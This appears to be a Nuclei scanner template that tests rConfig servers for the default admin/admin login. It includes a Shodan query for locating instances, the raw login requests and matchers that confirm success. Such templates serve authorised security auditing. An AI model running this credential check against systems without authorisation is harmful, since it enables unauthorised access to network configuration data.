id: rconfig-default-login
info:
  name: rConfig - Default Login
  author: theamanrawat
  severity: high
  description: |
    rConfig contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/rconfig/rconfig
  classification:
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    runzero-match: any(each(service["html.titles"]), {# matches "rConfig"})
    max-request: 2
    product: rconfig
    shodan-query: http.title:"rConfig"
    vendor: rconfig
    verified: true
  tags: default-login,rconfig,vuln
http:
  - attack: pitchfork
    host-redirects: true
    matchers:
      - condition: and
        part: body_2
        type: word
        words:
          - Logged in as
          - rConfig - Configuration Management
          - dashboadFieldSet
      - part: header_2
        type: word
        words:
          - text/html
      - part: header_2
        status:
          - 200
        type: status
    matchers-condition: and
    payloads:
      password:
        - admin
      username:
        - admin
    raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1
